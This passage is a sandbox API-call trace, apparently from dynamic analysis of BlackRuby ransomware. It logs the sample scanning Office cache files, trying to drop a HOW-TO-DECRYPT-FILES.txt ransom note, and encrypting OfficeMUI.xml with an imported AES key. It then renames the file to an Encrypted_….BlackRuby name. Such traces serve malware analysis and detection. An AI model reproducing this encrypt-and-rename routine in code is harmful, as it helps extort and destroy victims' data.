lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.800] GetLastError () returned 0x0 [0046.800] SetErrorMode (uMode=0x1) returned 0x0 [0046.800] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.800] GetLastError () returned 0x5 [0046.802] SetErrorMode (uMode=0x0) returned 0x1 [0046.802] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwdcw20.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwdcw20.dll", lpFilePart=0x0) returned 0x4a [0046.802] GetLastError () returned 0x5 [0046.802] SetErrorMode (uMode=0x1) returned 0x0 [0046.802] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\dwdcw20.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b5e4f4 | out: lpFileInformation=0x1b5e4f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0x30e33580, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x80760)) returned 1 [0046.802] GetLastError () returned 0x5 [0046.802] SetErrorMode (uMode=0x0) returned 0x1 [0046.803] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.803] GetLastError () returned 0x5 [0046.803] SetErrorMode (uMode=0x1) returned 0x0 [0046.803] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.803] GetLastError () returned 0x5 [0046.804] SetErrorMode (uMode=0x0) returned 0x1 [0046.804] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe", lpFilePart=0x0) returned 0x4b [0046.804] GetLastError () returned 0x5 [0046.805] SetErrorMode (uMode=0x1) returned 0x0 [0046.805] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\dwtrig20.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b7c44c | out: lpFileInformation=0x1b7c44c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0x30e33580, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0)) returned 1 [0046.805] GetLastError () returned 0x5 [0046.805] SetErrorMode (uMode=0x0) returned 0x1 [0046.806] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.806] GetLastError () returned 0x5 [0046.806] SetErrorMode (uMode=0x1) returned 0x0 [0046.806] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.806] GetLastError () returned 0x5 [0046.807] SetErrorMode (uMode=0x0) returned 0x1 [0046.807] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0046.808] GetLastError () returned 0x5 [0046.808] SetErrorMode (uMode=0x1) returned 0x0 [0046.808] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), fInfoLevelId=0x0, lpFileInformation=0x1b9a5bc | out: lpFileInformation=0x1b9a5bc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0x30e7f070, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x741)) returned 1 [0046.808] GetLastError () returned 0x5 [0046.808] SetErrorMode (uMode=0x0) returned 0x1 [0046.809] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.809] GetLastError () returned 0x5 [0046.809] SetErrorMode (uMode=0x1) returned 0x0 [0046.809] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.809] GetLastError () returned 0x5 [0046.810] SetErrorMode (uMode=0x0) returned 0x1 [0046.811] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\msvcr90.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\msvcr90.dll", lpFilePart=0x0) returned 0x4a [0046.811] GetLastError () returned 0x5 [0046.811] SetErrorMode (uMode=0x1) returned 0x0 [0046.811] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\msvcr90.dll"), fInfoLevelId=0x0, lpFileInformation=0x1bb8794 | out: lpFileInformation=0x1bb8794*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0x30e5a680, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xa0200)) returned 1 [0046.811] GetLastError () returned 0x5 [0046.811] SetErrorMode (uMode=0x0) returned 0x1 [0046.811] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.812] GetLastError () returned 0x5 [0046.812] SetErrorMode (uMode=0x1) returned 0x0 [0046.812] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.812] GetLastError () returned 0x5 [0046.813] SetErrorMode (uMode=0x0) returned 0x1 [0046.813] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeLR.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeLR.cab", lpFilePart=0x0) returned 0x4b [0046.813] GetLastError () returned 0x5 [0046.813] SetErrorMode (uMode=0x1) returned 0x0 [0046.813] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officelr.cab"), fInfoLevelId=0x0, lpFileInformation=0x1bd68fc | out: lpFileInformation=0x1bd68fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16abde00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x16abde00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f986600, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xda7a06)) returned 1 [0046.814] GetLastError () returned 0x5 [0046.814] SetErrorMode (uMode=0x0) returned 0x1 [0046.815] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.815] GetLastError () returned 0x5 [0046.815] SetErrorMode (uMode=0x1) returned 0x0 [0046.815] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.815] GetLastError () returned 0x5 [0046.816] SetErrorMode (uMode=0x0) returned 0x1 [0046.816] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.msi", lpFilePart=0x0) returned 0x4c [0046.816] GetLastError () returned 0x5 [0046.816] SetErrorMode (uMode=0x1) returned 0x0 [0046.816] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1bf4a6c | out: lpFileInformation=0x1bf4a6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b709200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x1b709200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f93ab10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x2bb000)) returned 1 [0046.817] GetLastError () returned 0x5 [0046.817] SetErrorMode (uMode=0x0) returned 0x1 [0046.817] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.817] GetLastError () returned 0x5 [0046.818] SetErrorMode (uMode=0x1) returned 0x0 [0046.818] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.818] GetLastError () returned 0x5 [0046.819] SetErrorMode (uMode=0x0) returned 0x1 [0046.819] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0046.819] GetLastError () returned 0x5 [0046.819] SetErrorMode (uMode=0x1) returned 0x0 [0046.819] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c12be0 | out: lpFileInformation=0x1c12be0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f93ab10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x161e)) returned 1 [0046.820] GetLastError () returned 0x5 [0046.820] SetErrorMode (uMode=0x0) returned 0x1 [0046.820] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0046.820] GetLastError () returned 0x5 [0046.820] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0046.820] GetLastError () returned 0x5 [0046.820] SetErrorMode (uMode=0x1) returned 0x0 [0046.820] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.820] GetLastError () returned 0x0 [0046.820] GetFileType (hFile=0x184) returned 0x1 [0046.820] SetErrorMode (uMode=0x0) returned 0x1 [0046.820] GetFileType (hFile=0x184) returned 0x1 [0046.820] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x161e [0046.820] GetLastError () returned 0x0 [0046.820] ReadFile (in: hFile=0x184, lpBuffer=0x1c14d18, nNumberOfBytesToRead=0x161e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c14d18*, lpNumberOfBytesRead=0x18ed84*=0x161e, lpOverlapped=0x0) returned 1 [0046.831] GetLastError () returned 0x0 [0046.831] CloseHandle (hObject=0x184) returned 1 [0046.831] GetLastError () returned 0x0 [0046.831] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0046.831] GetLastError () returned 0x0 [0046.831] SetErrorMode (uMode=0x1) returned 0x0 [0046.831] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f93ab10, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x161e)) returned 1 [0046.831] GetLastError () returned 0x0 [0046.831] SetErrorMode (uMode=0x0) returned 0x1 [0046.831] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0046.832] GetLastError () returned 0x0 [0046.863] CryptImportKey (in: hProv=0x37c680, pbData=0x1c71d44, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e20) returned 1 [0046.863] GetLastError () returned 0x0 [0046.863] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.863] GetLastError () returned 0x0 [0046.868] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.868] GetLastError () returned 0x0 [0046.868] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0046.868] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.868] GetLastError () returned 0x0 [0046.868] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1c9ed90*=0x1, dwFlags=0x0) returned 1 [0046.868] GetLastError () returned 0x0 [0046.868] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1c9ed5c, dwFlags=0x0) returned 1 [0046.868] GetLastError () returned 0x0 [0046.868] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c9edd8*, pdwDataLen=0x18ed74*=0x1710, dwBufLen=0x1710 | out: pbData=0x1c9edd8*, pdwDataLen=0x18ed74*=0x1710) returned 1 [0046.868] GetLastError () returned 0x0 [0046.868] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca1c24*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1ca1c24*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.868] GetLastError () returned 0x0 [0046.868] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ca1c54*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1ca1c54*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.868] GetLastError () returned 0x0 [0046.868] CryptDestroyKey (hKey=0x360e20) returned 1 [0046.868] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.868] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.868] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0046.868] GetLastError () returned 0x0 [0046.868] SetErrorMode (uMode=0x1) returned 0x0 [0046.868] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.869] GetLastError () returned 0xb7 [0046.869] GetFileType (hFile=0x184) returned 0x1 [0046.869] SetErrorMode (uMode=0x0) returned 0x1 [0046.869] GetFileType (hFile=0x184) returned 0x1 [0046.871] CloseHandle (hObject=0x184) returned 1 [0046.871] GetLastError () returned 0xb7 [0046.871] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0046.871] GetLastError () returned 0xb7 [0046.871] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_Pt3OCuPLIxkpvT0Rio35dJVR7Mhcgl62us4K4rvBZ5870.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_Pt3OCuPLIxkpvT0Rio35dJVR7Mhcgl62us4K4rvBZ5870.BlackRuby", lpFilePart=0x0) returned 0x80 [0046.871] GetLastError () returned 0xb7 [0046.871] SetErrorMode (uMode=0x1) returned 0x0 [0046.871] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x24243540, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1720)) returned 1 [0046.871] GetLastError () returned 0xb7 [0046.871] SetErrorMode (uMode=0x0) returned 0x1 [0046.871] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_Pt3OCuPLIxkpvT0Rio35dJVR7Mhcgl62us4K4rvBZ5870.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\encrypted_pt3ocuplixkpvt0rio35djvr7mhcgl62us4k4rvbz5870.blackruby")) returned 1 [0046.872] GetLastError () returned 0xb7 [0046.872] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.872] GetLastError () returned 0xb7 [0046.872] SetErrorMode (uMode=0x1) returned 0x0 [0046.872] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.872] GetLastError () returned 0x5 [0046.873] SetErrorMode (uMode=0x0) returned 0x1 [0046.873] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.msi", lpFilePart=0x0) returned 0x4f [0046.873] GetLastError () returned 0x5 [0046.873] SetErrorMode (uMode=0x1) returned 0x0 [0046.873] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemuiset.msi"), fInfoLevelId=0x0, lpFileInformation=0x1cc36dc | out: lpFileInformation=0x1cc36dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2297a000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2297a000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f8a0e20, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x9ec00)) returned 1 [0046.873] GetLastError () returned 0x5 [0046.873] SetErrorMode (uMode=0x0) returned 0x1 [0046.874] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All 